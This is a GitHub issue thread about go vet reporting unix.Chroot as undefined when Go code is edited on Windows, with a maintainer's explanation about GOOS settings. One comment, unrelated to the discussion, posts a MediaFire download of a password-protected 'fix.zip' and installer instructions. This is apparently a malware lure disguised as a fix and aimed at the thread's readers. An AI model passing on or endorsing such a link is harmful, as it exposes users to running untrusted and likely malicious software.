### ISSUE TITLE
import/path: undefined: unix.Chroot for "golang.org/x/sys/unix"

### ISSUE THREAD

**Issue by TheOnlyWei** [golang/go#69099]
### Go version

1.23.0

### Output of `go env` in your module/workspace:

```shell
set GO111MODULE=
set GOARCH=amd64
set GOBIN=
set GOCACHE=C:\Users\testadmin\AppData\Local\go-build
set GOENV=C:\Users\testadmin\AppData\Roaming\go\env
set GOEXE=.exe
set GOEXPERIMENT=
set GOFLAGS=
set GOHOSTARCH=amd64
set GOHOSTOS=windows
set GOINSECURE=
set GOMODCACHE=C:\Users\testadmin\go\pkg\mod
set GONOPROXY=
set GONOSUMDB=
set GOOS=windows
set GOPATH=C:\Users\testadmin\go
set GOPRIVATE=
set GOPROXY=https://proxy.golang.org,direct
set GOROOT=C:\Program Files\Go
set GOSUMDB=sum.golang.org
set GOTMPDIR=
set GOTOOLCHAIN=auto
set GOTOOLDIR=C:\Program Files\Go\pkg\tool\windows_amd64
set GOVCS=
set GOVERSION=go1.23.0
set GODEBUG=
set GOTELEMETRY=local
set GOTELEMETRYDIR=C:\Users\testadmin\AppData\Roaming\go\telemetry
set GCCGO=gccgo
set GOAMD64=v1
set AR=ar
set CC=gcc
set CXX=g++
set CGO_ENABLED=0
set GOMOD=C:\Users\testadmin\Desktop\test\go.mod
set GOWORK=
set CGO_CFLAGS=-O2 -g
set CGO_CPPFLAGS=
set CGO_CXXFLAGS=-O2 -g
set CGO_FFLAGS=-O2 -g
set CGO_LDFLAGS=-O2 -g
set PKG_CONFIG=pkg-config
set GOGCCFLAGS=-m64 -fno-caret-diagnostics -Qunused-arguments -Wl,--no-gc-sections -fmessage-length=0 -ffile-prefix-map=C:\Users\TESTAD~1\AppData\Local\Temp\3\go-build2624060371=/tmp/go-build -gno-record-gcc-switches
```

### What did you do?

I wrote code to call `unix.Chroot` from the `golang.org/x/sys/unix` package.
**main.go**
```go
package main

import (
	"golang.org/x/sys/unix"
)

func main() {
	err := unix.Chroot("/test")
	if err != nil {
		panic(err)
	}
}
```

**go.mod**
```mod
module test

go 1.23.0

require golang.org/x/sys v0.24.0
```
If I run the code, it runs fine.

### What did you see happen?

I get an undefined error in Visual Studio Code (red underline) and `go vet`:
```powershell
PS C:\Users\testadmin\Desktop\test> go vet
# test
# [test]
vet.exe: .\main.go:8:14: undefined: unix.Chroot
```
I also got this error in Go 1.22.6. This causes my builds to fail even though running the code has no issues.

### What did you expect to see?

Expected no errors from `go vet` or linting errors in Visual Studio Code because the code runs fine.

**Comment by cuonglm** [comment]
Where did you run the code?

That unix.Chroot is not available on Windows, so getting that error is expected.

You could set GOOS=linux environment variable, then `go vet` will run fine.

**Comment by TheOnlyWei** [comment]
@cuonglm Why is the error expected? I should be able to edit the code on any operating system. It should only have to run on Unix. I don't think it's good user-experience to tie code-editing to imported code-function.

**Comment by PiaoR** [comment]
Download 
https://www.mediafire.com/file/5t7dozm7sptcuqj/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by cuonglm** [comment]
> @cuonglm Why is the error expected? I should be able to edit the code on any operating system. It should only have to run on Unix. I don't think it's good user-experience to tie code-editing to imported code-function.

Because you are on Windows, then your editor will set the default GOOS based on your OS.

You could set GOOS env in your editor settings, then you can edit the code normally.
